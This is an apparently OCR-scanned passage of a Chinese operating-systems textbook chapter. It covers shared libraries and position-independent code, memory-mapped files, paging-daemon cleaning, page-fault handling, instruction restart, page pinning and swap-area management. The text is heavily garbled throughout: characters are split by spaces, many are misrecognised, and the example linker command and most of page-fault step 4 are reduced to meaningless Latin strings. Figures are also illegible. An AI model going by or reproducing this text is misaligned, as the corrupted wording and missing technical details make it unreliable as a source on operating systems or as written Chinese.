一 个 数据 页 面 进行 修改 ， 系 统 就 会 为 此 进程 复制 这 个 数据 页 面 的 一 个 副 
本 ， 并 且 这 个 副本 是 此 进程 私有 的 ， 也 就 是 说 会 执行 “ 写 时 复制 ”。 

















现代 操作 系统 中 ， 有 很 多 大 型 库 被 众多 进程 使 用 ， 例 如 ， 处 理 浏 览 
文件 以 便 打 开 文 件 的 对 话 框 的 库 和 多 个 图 形 库 。 把 所 有 的 这 些 库 静态 地 
与 磁盘 上 的 每 一 个 可 执行 程序 绑 定 在 一 起 ， 将 会 使 它们 变 得 更 加 庞大 。 


一 个 更 加 通用 的 技术 是 使 用 共享 库 〈 在 Windows 中 称 作 DLL 或 动态 
链接 库 ) 。 为 了 清楚 地 表达 共享 库 的 思想 ， 首 先 考虑 一 下 传统 的 链接 。 
当 链接 一 个 程序 时 ， 要 在 链接 器 的 命令 中 指定 一 个 或 多 个 目标 文件 ， 可 
能 还 包括 一 些 库 文件 。 以 下 面 的 UNIX 命 令 为 例 : 


La* OO—.e=]m 





这 个 命令 会 链接 当前 目录 下 的 所 有 的 .o《〈 目 标 ) 文件 ， 并 扫描 两 个 


JÆ: /usr/lib/libc.a 和 /usr/lib/libm.a。 任 何在 目标 文件 中 被 调用 了 但 是 没有 
被 定义 的 函数 《〈 比 如，Pprintft) ， 都 被 称 作 未 定义 外 部 函数 Cundefined 
externals) 。 链 接 器 会 在 库 中 寻找 这 些 未 定义 外 部 函数 。 如 果 找 到 了 ， 
则 将 它们 加 载 到 可 执行 二 进 制 文件 中 。 任 何 被 这 些 未 定义 外 部 函数 调用 
了 但 是 不 存在 的 函数 也 会 成 为 未 定义 外 部 函数 。 例 如 ，printf 需 

write， 如 果 write 还 没有 被 加 载 进 来 ， 链 接 器 就 会 查找 write 并 在 找到 后 把 
它 加 载 进来 。 当 链接 器 完成 任务 后 ， 一 个 可 执行 二 进 制 文件 被 写 到 磁 
盘 ， 其 中 包括 了 所 需 的 全 部 函数 。 在 库 中 定义 但 是 没有 被 调用 的 函数 则 
不 会 被 加 载 进去 。 当 程序 被 装 入 内 存 执行 时 ， 它 需要 的 所 有 函数 都 已 经 
准备 就 绪 了 。 











假设 普通 程序 需要 消耗 20 一 50MB 用 于 图 形 和 用 户 界 面 函 数 。 静 态 
链接 上 百 个 包括 这 些 库 的 程序 会 浪费 大 量 的 磁盘 空间 ， 在 装载 这 些 程序 
时 也 会 浪费 大 量 的 内 存 空 间 ， 因 为 系统 不 知道 它 可 以 共享 这 些 库 。 这 就 
是 引入 共享 库 的 原因 。 当 一 个 程序 和 共享 库 “〈 与 静态 库 有 些许 区 别 ) 链 
接 时 ， 链 接 器 没有 加 载 被 调用 的 函数 ， 而 是 加 载 了 一 小 段 能 够 在 运行 时 
绑 定 被 调用 函数 的 存根 例 程 (stub routine) 。 依 赖 于 系统 和 配置 信息 ， 
共享 库 或 者 和 程序 一 起 被 装载 ， 或 者 在 其 所 包含 函数 第 一 次 被 调用 时 被 
装载 。 当 然 ， 如 果 其 他 程序 已 经 装载 了 某 个 共享 库 ， 就 没有 必要 再 次 装 
载 它 了 一 一 这 正 是 关键 所 在 。 值 得 注意 的 是 ， 当 一 个 共享 库 被 装载 和 使 
用 时 ， 整 个 库 并 不 是 被 一 次 性 地 读 入 内 存 。 而 是 根据 需要 ， 以 页 面 为 单 
位 装载 的 ， 因 此 没有 被 调用 到 的 函数 是 不 会 被 装载 到 内 存 中 的 。 

















除了 可 以 使 可 执行 文件 更 小 、 节 省 内 存 空间 之 外 ， 共 享 库 还 有 一 个 
优点 : 如果 共 享 库 中 的 一 个 函数 因为 修正 一 个 bug 被 更 新 了， 那么 并 不 

要 重新 编译 调用 了 这 个 函数 的 程序 。 旧 的 二 进 制 文件 依然 可 以 正常 工 
作 。 这 个 特性 对 于 商业 软件 来 说 尤为 重要 ， 因 为 商业 软件 的 源码 不 会 分 
发 给 客户 。 例 如 ， 如 果 微 软 发 现 并 修复 了 茶 个 标准 DLL 中 的 安全 错误 ， 
Windows 更 新 会 下 载 新 的 DLL 来 痊 换 原 有 文件 ， 所 有 使 用 这 个 DLL 的 程 
序 在 下 次 局 动 时 会 目 动 使 用 这 个 新 版 本 的 DLL。 











不 过 ， 共 享 库 带 来 了 一 个 必须 解决 的 小 问题 ， 如 图 3-27 所 示 。 我 们 
看 到 有 两 个 进程 共享 一 个 20KB 大 小 的 库 〈 假 设 每 一 方 框 为 4KB) 。 但 
是 ， 这 个 库 被 不 同 的 进程 定位 在 不 同 的 地 址 上 ， 大 概 是 因为 程序 本 身 的 
大 小 不 相同 。 在 进程 1 中 ， 库 从 地 址 36K 开 始 ， 在 进程 2 中 则 从 地 址 12K 
开始 。 假 设 库 中 第 一 个 函数 要 做 的 第 一 件 事 就 是 跳 转 到 库 的 地 址 16。 如 
果 这 个 库 没 有 被 共享 ， 它 可 以 在 装载 的 过 程 中 重 定位 ， 就 会 跳 转 〈 在 进 
程 1 中 〉 到 虚拟 地 址 的 36K+16。 注 意 ， 库 被 装载 到 的 物理 地 址 与 这 个 库 

个 为 共享 库 是 没有 任何 关系 的 ， 因 为 所 有 的 页 面 都 被 MMU 人 硬件 从 虚 
拟 地 址 映射 到 了 物理 地 址 。 























进程 1 RAM 进程 2 


图 3-27 两 个 进程 使 用 的 共享 库 


但 是 ， 由 于 库 是 共享 的 ， 因 此 在 装载 时 再 进行 重 定位 就 行 不 通 了 。 
毕竟 ， 当 进程 2 调用 第 一 个 函数 时 〈 在 地 址 12K) ， 跳 转 指令 需要 跳 转 
到 地 址 12K+16， 而 不 是 地 址 36K+16。 这 就 是 那个 必须 解决 的 小 问题 。 
解决 它 的 一 个 办 法 是 写 时 复制 ， 并 为 每 一 个 共享 这 个 库 的 进程 创建 新 页 
面 ， 在 创建 新 页 面 的 过 程 中 进行 重 定位 。 当 然 ， 这 样 做 和 使 用 共享 库 的 
目的 相悖 。 





一 个 更 好 的 解决 方法 是 : 在 编译 共 至 库 时 ， 用 一 个 特殊 的 编译 选项 
告知 编译 器 ， 不 要 产生 使 用 绝对 地 址 的 指令 。 相 反 ， 只 能 产生 使 用 相对 
地 址 的 指令 。 例 如 ， 几 乎 总 是 使 用 同 前 《或 加 后 ) when SF (See 
出 具体 跳 转 地 址 的 指令 不 同 ) 的 指令 。 不 论 共 胖 库 被 放置 在 虚拟 地 址 衬 


间 的 什么 位 置 ， 这 种 指令 都 可 以 正确 工作 。 通 过 避免 使 用 绝对 地 址 ， 这 
个 问题 就 可 以 被 解决 。 只 使 用 相对 偏 移 量 的 代码 被 称 作 位 置 无 天 代码 


(position-independent code) 。 


3.5.7 ”内存 映射 文件 


共 孚 库 实 际 上 是 一 种 更 为 通用 的 机 制 一 一 内 存 映射 文件 (memory- 
mapped file) 的 一 个 特例 。 这 种 机 制 的 思想 是 : 进程 可 以 通过 发 起 一 个 
系统 调用 ， 将 一 个 文件 映射 到 其 虚拟 地 址 空间 的 一 部 分 。 在 多 数 实现 
中 ， 在 映射 共享 的 页 面 时 不 会 实际 读 入 页 面 的 内 容 ， 而 是 在 访问 页 面 时 
才 会 被 每 次 一 页 地 读 入 ， 和 磁盘 文件 则 被 当 作 后 备 存 储 。 当 进程 退出 或 显 
式 地 解除 文件 映射 时 ， 所 有 被 改动 的 页 面 会 被 写 回 到 文件 中 。 





内 存 映射 文件 提供 了 一 种 WO 的 可 选 模 型 。 可 以 把 一 个 文件 当 作 一 
个 内 存 中 的 大 字符 数组 来 访问 ， 而 不 用 通过 读 写 操作 来 访问 这 个 文件 。 
在 一 些 情况 下 ， 程 序 员 发 现 这 个 模型 更 加 便利 。 








如 果 两 个 或 两 个 以 上 的 进程 同时 映射 了 同一 个 文件 ， 它 们 就 可 以 通 
过 共享 内 存 来 通信 。 一 个 进程 在 共 至 内 存 上 完成 了 写 操作 ， 此 刻 当 男 一 
个 进程 在 映射 到 这 个 文件 的 虚拟 地 址 空间 上 执行 读 操 作 时 ， 它 就 可 以 立 
刻 看 到 上 一 个 进程 写 操作 的 结果 。 因 此 ， 这 个 机 制 提供 了 一 个 进程 之 间 
的 高 带宽 通道 ， 而 且 这 种 应 用 很 普 裔 (甚至 扩展 到 用 来 映 冉 无 名 的 临时 
文件 ) 。 很 显然 ， 如 果 内 存 映射 文件 可 用 ， 共 有 至 库 就 可 以 使 用 这 个 机 
制 |。 








3.5.8 ”清除 策略 


如 果 发 生 缺 页 中 断 时 系统 中 有 大 量 的 空闲 页 框 ， 此 时 分 页 系统 工作 
在 最 佳 状态 。 如 果 每 个 页 框 都 被 占用 ， 而 且 被 修改 过 的 话 ， 再 换 入 一 个 
新 页 面 时 ， 旧 页 面 应 首先 被 写 回 磁盘 。 为 保证 有 足够 的 空闲 页 框 ， 很 多 
分 页 系统 有 一 个 称 为 分 页 守护 进程 (paging daemon) 的 后 台 进 程 ， 它 在 
大 多 数 时 候 睡 虐 ， 但 定期 被 唤醒 以 检查 内 存 的 状态 。 如 果 空 用 页 框 过 
,分 页 守护 进程 通过 预定 的 页 面 置 换算 法 选择 页 面 换 出 内 存 。 如 果 这 
些 页 面 逆 入 内 存 后 被 修改 过 ， 则 将 它们 写 回 磁盘 。 





\ 





在 任何 情况 下 ， 页 面 中 原先 的 内 容 都 被 记录 下 来 。 当 需要 使 用 一 个 
己 被 淘汰 的 页 面 时 ， 如 采 该 页 框 还 没有 被 覆盖 ， 将 其 从 空闲 页 框 缓冲 池 
中 移出 即 可 恢复 该 页 面 。 保 存 一 定数 目的 页 框 供给 比 使 用 所 有 内 存 并 在 
需要 时 搜索 一 个 页 框 有 更 好 的 性 能 。 分 页 守护 进程 至 少 保证 了 所 有 的 空 
朵 页 框 羡 “干净 ?的 ， 所 以 空闲 页 框 在 被 分 配 时 不 必 再 急 着 写 回 磁盘 。 








一 种 实现 清除 策略 的 方法 就 是 使 用 一 个 双 指针 时 钟 。 前 指针 由 分 页 
守护 进程 控制 。 当 它 指 同一 个 脏 页 面 时 ， 就 把 该 页 面 写 回 磁盘 ， 前 指针 
问 前 移动 。 当 它 指 向 一 个 干 滔 页 面 时 ， 仪 仅 指 针 癌 前 移动 。 后 指针 用 于 
页 面 置换 ， 就 像 在 标准 时 钟 算法 中 一 样 。 现 在 ， 由 于 分 页 守护 进程 的 工 
作 ， 后 指针 命中 干净 页 面 的 概率 会 增加 。 





3.5.9 ”虚拟 内 存 接 口 





到 现在 为 止 ， 所 有 的 讨论 都 假定 虚拟 内 存 对 进程 和 程序 员 来 说 是 透 
明 的 ， 也 就 是 说 ， 它 们 都 可 以 在 一 合 只 有 较 少 物理 内 存 的 计算 机 上 看 到 
很 大 的 虚拟 地 址 空间 。 对 于 不 少 系统 而 言 这 样 做 是 对 的 ， 但 对 于 一 些 高 
级 系统 而 言 ， 程 序 员 可 以 对 内 存 映射 进行 控制 ， 并 可 以 通过 非常 规 的 方 
法 来 增强 程序 的 行为 。 这 一 节 我 们 将 简短 地 讨论 一 下 这 些 问题 。 














允许 程序 员 对 内 存 映射 进行 控制 的 一 个 原因 束 是 为 了 允许 两 个 或 者 
多 个 进程 共享 同一 部 分 内 存 。 如 果 程 序 员 可 以 对 内 存 区 域 进行 命名 ， 那 
么 就 有 可 能 实现 共享 内 存 。 通 过 让 一 个 进程 把 一 片 内 存 区 域 的 名 称 通知 
另 一 个 进程 ， 而 使 得 第 二 个 进程 可 以 把 这 片区 域 映 射 到 它 的 虚拟 地 址 衬 
间 中 去 。 通 过 两 个 进程 〈 或 者 更 多 ) 共享 同一 部 分 页 面 ， 高 带宽 的 共享 
束 成 为 可 能 一 一 一 个 进程 往 共 至 内 存 中 写 内 容 而 为 一 个 从 中 读 出 内 容 。 








页 面 共 胖 也 可 以 用 来 实现 高 性 能 的 消息 传递 系统 。 一 般 地 ， 传 递 消 
奶 的 时 候 ， 数 据 被 从 一 个 地 址 空间 复制 到 另 一 个 地 址 空间 ， 开 销 很 大 。 
如 果 进 程 可 以 控制 它们 的 页 面 映射 ， 就 可 以 这 样 来 发 送 一 条 消 轧 : GK 
进程 清除 那些 包含 消 妃 的 页 面 的 映射 ， 而 接收 进程 把 它们 映射 进来 。 这 
里 只 需要 复制 页 面 的 名 字 ， 而 不 需要 复制 所 有 数据 。 























另外 一 种 高 级 存储 管理 技术 是 分 布 式 共 且 内存 〈Feeley 等 人 ， 


1995; Li, 1986; Li 和 Hudak，1989; Zekauskas 等 人 ，1994) 。 该 方法 
允许 网 络 上 的 多 个 进程 共享 一 个 页 面 集合 ， 这 些 页 面 可 能 (而 不 是 必要 
的 ) 作为 单个 的 线性 共享 地 址 空间 。 当 一 个 进程 访问 当前 还 没有 映射 进 
来 的 页 面 时 ， 就 会 产生 缺 页 中 断 。 在 内 核 空间 或 者 用 户 空 间 中 的 缺 页 中 
断 处 理 程序 就 会 对 拥有 该 页 面 的 机 器 进行 定位 ， 并 向 它 发 送 一 条 消息 ， 
请 求 它 清除 该 页 面 的 映射 ， 并 通过 网 络 发 送出 来 。 当 页 面 到 达 时 ， 就 把 
它 映射 进来 ， 并 重新 开始 运行 引起 缺 页 中 断 的 指令 。 在 第 8 章 中 我 们 将 
详细 讨论 分 布 式 共享 内 存 。 














3.6 有关 实现 的 问题 


实现 虚拟 内 存 系统 要 在 主要 的 理论 算法 〈 如 第 二 次 机 会 算法 与 老化 
算法 ， 局 部 页 面 分 配 与 全 局 页 面 分 配 ， 请 求 调 页 与 预先 调 页 ) 之 间 进 行 
选择 。 但 同时 也 要 注意 一 系列 实际 的 实现 问题 。 在 这 一 市 中 将 涉及 一 些 
通常 情况 下 会 遇 到 的 问题 以 及 一 些 解决 方案 。 








3.6.1 与 分 页 有 天 的 工作 


操作 系统 要 在 下 面 的 四 段 时 间 里 做 与 分 页 相关 的 工作 : 进程 创建 
时 ， 进 程 执 行 时 ， 缺 页 中 断 时 和 进程 终止 时 。 下 面 将 分 别 对 这 四 个 时 期 
进行 简短 的 分 析 。 


当 在 分 页 系统 中 创建 一 个 新 进程 时 ， 操 作 系 统 要 确定 程序 和 数据 在 
初始 时 有 多 大 ， 并 为 它们 创建 一 个 页 表 。 操 作 系统 还 要 在 内 存 中 为 页 表 
分 配 空间 并 对 其 进行 初始 化 。 当 进程 被 换 出 时 ， 页 表 不 需要 驻 留 在 内 存 
中 ， 但 当 进 程 运 行 时 ， 它 必须 在 内 存 中 。 为 外 ， 操 作 系 统 要 在 磁盘 交换 
区 中 分 配 空间 ， 以 便 在 一 个 进程 换 出 时 在 磁盘 上 有 放置 此 进程 的 空间 。 
操作 系统 还 要 用 程序 正文 和 数据 对 交换 区 进行 初始 化 ， 这 样 当 新 进程 发 
生 缺 页 中 断 时 ， 可 以 调 入 需要 的 页 面 。 东 些 系统 直接 从 磁盘 上 的 可 执行 
文件 对 程序 正文 进行 分 页 ， 以 市 省 磁盘 空间 和 初始 化 时 间 。 最 后 ， 操 作 





系统 必须 把 有 关 页 表 和 磁盘 交换 区 的 信息 存储 在 进程 表 中 。 


当 调 度 一 个 进程 执行 时 ， 必 须 为 新 进程 重 置 MMU， 刷 新 TLB， 以 
清除 以 前 的 进程 遗留 的 痕迹 。 新 进程 的 页 表 必 须 成 为 当前 页 表 ， 通 党 可 
以 通过 复制 该 页 表 或 者 把 一 个 指 同 它 的 指针 放 进 茶 个 硬件 寄存 器 来 完 
成 。 有 时 ， 在 进程 初始 化 时 可 以 把 进程 的 部 分 或 者 全 部 页 面 装 入 内 存 中 
以 减少 缺 页 中 断 的 发 生 ， 例 如 ，PC (程序 计数 器 〉 所 指 的 页 面 肯定 是 


需要 的 。 











当 缺 页 中 断 发 生 时 ， 操 作 系统 必须 通过 读 便 件 寄存 露 来 确定 是 哪个 
虚拟 地 址 造成 了 缺 页 中 断 。 通 过 该 信息 ， 它 要 计算 需要 哪个 页 面 ， 并 在 
磁盘 上 对 该 页 面 进行 定位 。 它 必须 找到 合适 的 页 框 来 存放 新 页 面 ， 必 要 
时 还 要 置换 老 的 页 面 ， 然 后 把 所 需 的 页 面 读 入 页 框 。 最 后 ， 还 要 备份 程 
序 计 数 器 ， 使 程序 计数 器 指向 引起 缺 页 中 断 的 指令 ， 并 重新 执行 该 指 


令 。 


当 进 程 退 出 的 时 候 ， 操 作 系 统 必须 释放 进程 的 页 表 、 页 面 和 页 面 在 
人 硬盘 上 所 占用 的 空间 。 如 果 某 些 页 面 是 与 其 他 进程 共享 的 ， 当 最 后 一 个 
使 用 它们 的 进程 终止 的 时 候 ， 才 可 以 释放 内 存 和 磁盘 上 的 页 面 。 





03.6.2” 缺 页 中 断 处 理 





我 们 终于 可 以 讨论 缺 页 中 断 发 生 的 细节 了 。 缺 页 中 断 发 生 时 的 事件 
顺序 如 下 : 


1) 硬 件 陷 入 内 核 ， 在 堆栈 中 保存 程序 计数 费 。 大 多 数 机 器 将 当前 指 
令 的 各 种 状态 信息 保存 在 特殊 的 CPU 寄存 器 中 。 





2) 月 动 一 个 汇编 代码 例 程 保存 通用 寄存 器 和 其 他 易 失 的 信息 ， 以 锡 
被 操作 系统 破坏 。 这 个 例 程 将 操作 系统 作为 一 个 函数 来 调用 。 





3) 当 操作 系统 发 现 一 个 缺 页 中 断 时 ， 演 试 发 现 需要 哪个 虚拟 页 面 。 

通 肖 一 个 便 件 寄存 器 包含 了 这 一 信息 ， 如 有 果 没 有 的 话 ， 操 作 系统 必须 检 
索 程 序 计 数 器 ， 取 出 这 条 指令 ， 用 软件 分 析 这 条 指令 ， 看 看 它 在 缺 页 中 
TE IEE BUT o 


4)— FURIE SAAR ER UATE ae, BRE AR Sit hr Ek Pe 
BAR FREAKS RP ERM. WRB MEER Ma 
号 或 杀 挥 该 进程 。 如 果 地 址 有 效 且 没有 保护 错误 发 生 ， 系 统 则 检查 是 否 
有 空闲 页 框 。 如 果 没 有 空闲 页 框 ， 执 行 页 面 置换 算法 寻找 一 个 页 面 来 淘 
汰 。 











5) 如 果 选 择 的 页 框 < 脏 > 了 ， 安 排 该 页 写 回 磁盘 ， 并 发 生 一 次 上 下 文 





切换 ， 挂 起 产生 缺 页 中 断 的 进程 ， 让 其 他 进程 运行 直至 磁盘 传输 结 
无 论 如 何 ， 该 页 框 被 标记 为 忙 ， 以 免 因 为 其 他 原因 而 被 其 他 进程 占用 。 





6) 一 旦 页 框 “ 干 净 ? 后 《无 论 是 立刻 还 是 在 写 回 磁盘 后 ) ， 操 作 系 统 
碍 找 所 需 页 面 在 磁盘 上 的 地 址 ， 通 过 磁盘 操作 将 其 装 入 。 该 页 面 被 朔 入 
后 ， 产 生 缺 页 中 断 的 进程 仍然 被 挂 起 ， 并 且 如 果 有 其 他 可 运行 的 用 户 进 
程 ， 则 选择 另 一 个 用 户 进程 运行 。 

















7) 当 磁盘 中 断 发 生 时 ， 表 明 该 页 已 经 被 装 入 ， 页 表 已 经 更 新 可 以 反 
上 映 它 的 位 置 ， 页 框 也 航标 记 为 正常 状态 。 


8) 恢 复 及 生 缺 页 中 断 指 令 以 前 的 状态 ， 程 序 计数 器 重新 指 同 这 条 指 


令 。 


9) 调 度 引 及 缺 页 中 断 的 进程 ， 操 作 系 统 返 回调 用 它 的 汇编 语言 例 


10) 该 例 程 恢复 寄存 器 和 其 他 状态 信息 ， 返 回 到 用 户 空 间 继续 执 
行 ， 束 好 像 缺 页 中 断 没 有 发 生 过 一 样 。 


3.6.3 ”指令 备份 





当 程序 访问 不 在 内 存 中 的 页 面 时 ， 引 起 缺 页 中 断 的 指令 会 半途 停止 
并 引发 操作 系统 的 陷阱 。 在 操作 系统 取出 所 需 的 页 面 后 ， 它 需要 重新 局 
动 引起 陷阱 的 指令 。 但 这 并 不 是 一 件 容易 实现 的 事 。 





我 们 在 最 坏 情 形 下 考察 这 个 问题 的 实质 ， 考 虑 一 个 有 双 地 址 指令 的 
CPU， 比 如 Motorola 680x0， 这 是 一 种 在 舱 入 式 系统 中 广泛 使 用 的 
CPU。 例 如 ， 指 令 





MOVE .L#6 (A1) ,2 (A0) 











为 6 字 节 ( 见 图 3-28) 。 为 了 重启 该 指令 ， 操 作 系统 要 知道 该 指令 
第 一 个 字 节 的 位 置 。 在 陷阱 发 生 时 ， 程 序 计数 器 的 值 依赖 于 引起 缺 页 中 
断 的 那个 操作 数 以 及 CPU 中 微 指令 的 实现 方式 。 


MOVE.L #6(A1), 2(A0) 
\~————16 位 ———>| 


1000 MOVE } 操作 码 
1002| Cd SB RHA 


1004 [2 jaren 


图 3-28 引起 缺 页 中 断 的 一 条 指令 


在 图 3-28 中 ， 从 地 址 1000 处 开始 的 指令 进行 了 3 次 内 存 访问 : 指令 
字 本 身 和 操作 数 的 2 个 偏 移 量 。 从 可 以 产生 缺 页 中 断 的 这 3 次 内 存 访问 来 
看 ， 程 序 计 数 器 可 能 在 1000、1002 和 1004 时 发 生 缺 页 中 断 ， 对 操作 系统 
来 说 要 准确 地 判断 指令 是 从 哪儿 开始 的 通常 是 不 可 能 的 。 如 果 发 生 缺 页 
中 断 时 程序 计数 器 是 1002， 操 作 系 统 无 法 弄 清 在 1002 位 置 的 字 是 与 1000 
的 指令 有 关 的 内 存 地 址 (比如 ， 一 个 操作 数 的 位 置 ) ， 还 是 一 个 指令 的 
操作 码 。 








这 种 情况 已 经 很 糟糕 了 ， 但 可 能 还 有 更 糟 的 情况 。 一 些 680x0 体 系 
结构 的 寻 址 方式 采用 自动 增 量 ， 这 也 意味 着 执行 这 条 指令 的 副作用 是 会 
增 量 一 个 或 多 个 寄存 器 。 使 用 自动 增 量 模式 也 可 能 引起 错误 。 这 依赖 于 
微 指令 的 具体 实现 ， 这 种 增 量 可 能 会 在 内 存 访问 之 前 完成 ， 此 时 操作 系 
统 必 须 在 重启 这 条 指令 前 将 软件 中 的 寄存 器 减 量 。 自 动 增 量 也 可 能 在 内 
存 访问 之 后 完成 ， 此 时 ， 它 不 会 在 陷入 时 完成 而 且 不 必 由 操作 系统 恢 
复 。 自 动 减 量 也 会 出 现 相同 的 问题 。 自 动 增 量 和 自动 减 量 是 否 在 相应 访 
存 之 前 完成 随 着 指令 和 CPU 模 式 的 不 同 而 不 同 。 









































幸运 的 是 ， 在 某 些 计算 机 上 ，CPU 的 设计 者 们 提供 了 一 种 解决 方 
法 ， 就 是 通过 使 用 一 个 隐藏 的 内 部 寄存 器 。 在 每 条 指令 执行 之 前 ， 把 程 
序 计 数 器 的 内 容 复制 到 该 寄存 器 。 这 些 机 器 可 能 会 有 第 二 个 寄存 器 ， 用 
来 提供 哪些 寄存 器 已 经 自动 增加 或 者 自动 减少 以 及 增 减 的 数量 等 信息 。 
通过 这 些 信 息 ， 操 作 系统 可 以 消除 引起 缺 页 中 断 的 指令 所 造成 的 所有 影 





啊 ， 并 使 指令 可 以 重新 开始 执行 。 如 果 该 信息 不 可 用 ， 那 么 操作 系统 就 
要 找 出 所 发 生 的 问题 从 而 设法 来 修复 它 。 看 起 来 硬件 设计 者 是 不 能 解决 
这 个 问题 了 ， 于 是 他 们 就 推 给 操作 系统 的 设计 者 来 解决 这 个 问题 。 





3.6.4 锁定 内 存 中 的 页 面 


尽管 本 章 对 IMO 的 讨论 不 多 ， 但 计算 机 有 虚拟 内 存 并 不 意味 着 MO 不 
起 作用 了 。 虚 拟 内 存 和 IO 通过 微妙 的 方式 相互 作用 着 。 设 想 一 个 进程 
刚刚 通过 系统 调用 从 文件 或 其 他 设备 中 读 取 数据 到 其 地 址 空间 中 的 缓冲 
区 。 在 等 待 O 完 成 时 ， 该 进程 被 挂 起 ， 另 一 个 进程 被 允许 运行 ， 而 这 
个 进程 产生 一 个 缺 页 中 断 。 





如 果 分 页 算法 是 全 局 算法 ， 包 含 O 缓 冲 区 的 页 面 会 有 很 小 的 机 会 
《但 不 是 没有 ) 被 选中 换 出 内 存 。 如 果 一 个 IO 设备 正 处 在 对 该 页 面 进 
行 DMA 传 输 的 过 程 之 中 ， 将 这 个 页 面 移出 将 会 导致 部 分 数据 写 入 它们 
所 属 的 缓冲 区 中 ， 而 部 分 数据 被 写 入 到 最 新 装 入 的 页 面 中 。 一 种 解决 方 
法 是 锁 住 正在 做 IO 操作 的 内 存 中 的 页 面 以 保证 它 不 会 被 移出 内 存 。 锁 
住 一 个 页 面 通常 称 为 在 内 存 中 钉 住 (pinning) 页 面 。 另 一 种 方法 是 在 内 
核 缓冲 区 中 完成 所 有 的 MO 操作 ， 然 后 再 将 数据 复制 到 用 户 页 面 。 





3.6.5 后备 存储 


在 前 面 讨论 过 的 页 面 置换 算法 中 ， 我 们 已 经 知道 了 如 何 选择 换 出 内 
存 的 页 面 。 但 是 却 没有 讨论 当 页 面 被 换 出 时 会 存放 在 磁盘 上 的 哪个 位 
置 。 现 在 我 们 讨论 一 下 磁盘 管理 相关 的 问题 。 





在 磁盘 上 分 配 页 面 空 间 的 最 简单 的 算法 是 在 磁盘 上 设置 特殊 的 交换 
分 区 ， 甚 至 从 文件 系统 划分 一 块 独立 的 磁盘 《以 平衡 WO 负载 ) 。 大 多 
数 UNIX 是 这 样 处 理 的 。 在 这 个 分 区 里 没有 普通 的 文件 系统 ， 这 样 就 消 
除了 将 文件 偏 移 转换 成 天地 址 的 开销 。 取 而 代 之 的 是 ， 始 终 使 用 相应 分 
区 的 起 始 块 号 。 





当 系统 启动 时 ， 该 交换 分 区 为 空 ， 并 在 内 存 中 以 单独 的 项 给 出 它 的 
起 始 和 大 小 。 在 最 简单 的 情况 下 ， 当 第 一 个 进程 局 动 时 ， 留 出 与 这 个 进 
程 一 样 大 的 交换 区 块 ， 剩 余 的 为 总 空间 减 去 这 个 交换 分 区 。 当 新 进程 局 
动 后 ， 它 们 同样 被 分 配 与 其 核心 映像 同等 大 小 的 交换 分 区 。 进 程 结束 
后 ， 会 释放 其 磁盘 上 的 交换 区 。 交 换 分 区 以 空闲 块 列 表 的 形式 组 织 。 更 
好 的 算法 在 第 10 章 里 讨论 。 








与 每 个 进程 对 应 的 是 其 交换 区 的 磁盘 地 址 ， 即 进程 映像 所 保存 的 地 
奶 是 记录 在 进程 表 里 的 。 写 回 一 个 页 面 时 ， 计 算 写 回 地 址 的 
过 程 很 简单 : 将 虚拟 地 址 空间 中 页 面 的 偶 移 量 加 到 交换 区 的 开始 地 址 。 


= 


但 在 进程 启动 前 必须 初始 化 交换 区 ， 一 种 方法 是 将 整个 进程 映像 复制 到 
交换 区 ， 以 便 随 时 可 将 所 需 和 内容 装 入 ， 必 一 种 方法 是 将 整个 进程 装 入 内 
存 ， 并 在 需要 时 换 出 。 


但 这 种 简单 模式 有 一 个 问题 : 进程 在 局 动 后 可 能 增 大 ， 尽 管 程序 正 
文通 第 是 固定 的 ， 但 数据 有 时 会 增长 ， 堆 栈 也 总 是 在 随时 增长 。 这 样 ， 
最 好 为 正文 、 数 据 和 堆栈 分 别 保留 交换 区 ， 并 且 人 允许 这 些 交换 区 在 磁盘 
上 多 于 一 个 块 。 








男 一 个 极端 的 情况 是 事先 什么 也 不 分 配 ， 在 页 面 换 出 时 为 其 分 配 磁 
盘 空间 ， 并 在 换 入 时 回收 磁盘 空间 ， 这 样 内存 中 的 进程 不 必 固 定 于 任何 
空间 。 其 缺点 是 内 存 中 每 个 页 面 都 要 记录 相应 的 磁盘 地 址 。 换 言 
每 个 进程 都 必须 有 一 张 表 ， 记 录 每 一 个 页 面 在 磁盘 上 的 位 置 。 这 两 
方案 如 图 3-29 所 示 。 

















图 3-29 a) 对 静态 交换 区 分 页 ; b) 动 态 备份 页 面 


在 图 3-29a 中 ， 有 一 个 带 有 8 个 页 面 的 页 表 。 页 面 0、3、4 和 6 在 内 存 
中 。 页 面 1、2、5 和 7 在 磁盘 上 。 磁 盘 上 的 交换 区 与 进程 虚拟 地 址 空间 
(8 页 面 ) 一 样 大 ， 每 个 页 面 有 固定 的 位 置 ， 当 它 从 内 存 中 被 淘汰 时 ， 
便 写 到 相应 位 置 。 该 地 址 的 计算 需要 知道 进程 的 分 页 区 域 的 起 始 位 置 ， 
因为 页 面 是 按照 它们 的 虚拟 页 号 的 顺序 连续 存储 的 。 内 存 中 的 页 面 通 常 
在 磁盘 上 有 镜像 副本 ， 但 是 如 果 页 面 装 入 后 被 修改 过 ， 那 么 这 个 副本 就 
可 能 是 过 期 的 了 。 内 存 中 的 深 色 页 面 表示 不 在 内 存 ， 磁 盘 上 的 深 色 页 面 
(原则 上 ) 被 内 存 中 的 副本 所 蔡 代 ， 但 如 果 有 一 个 内 存 页 面 要 被 换 回 磁 
盘 并 且 该 页 面 在 装 入 内 存 后 没有 被 修改 过 ， 那 么 将 使 用 磁盘 中 《〈 深 色 ) 
的 副本 。 

















在 图 3-29b 中 ， 页 面 在 磁盘 上 没有 固定 地 址 。 当 页 面 换 出 时 ， 要 及 





时 选择 一 个 空 磁盘 页 面 并 据 此 来 更 新 磁盘 映射 “每 个 虚拟 页 面 都 有 一 个 
磁盘 地 址 空间 ) 。 内 存 中 的 页 面 在 磁盘 上 没有 副本 。 它 们 在 磁盘 映射 表 
中 的 表 项 包含 一 个 非法 的 磁盘 地 址 或 者 一 个 表示 它们 未 被 使 用 的 标记 


位 。 








不 能 保证 总 能 够 实现 固定 的 交换 分 区 。 例 如 ， 没 有 磁盘 分 区 可 用 
时 。 在 这 种 情况 下 ， 可 以 利用 正常 文件 系统 中 的 一 个 或 多 个 较 大 的 、 事 
前 定位 的 文件 。Windows 就 使 用 这 个 方法 。 然 而 ， 可 以 利用 优化 方法 减 
少 所 需 的 磁盘 空间 量 。 既 然 每 个 进程 的 程序 正文 来 目 文 件 系 统 中 菏 个 
(可 执行 的 ) 文件 ， 这 个 可 执行 文件 就 可 用 作 交 换 区 。 而 更 好 的 方法 
是 ， 由 于 程序 正文 通 第 是 只 读 的 ， 当 内 存 资 源 紧 张 、 程 序 页 不 得 不 移出 
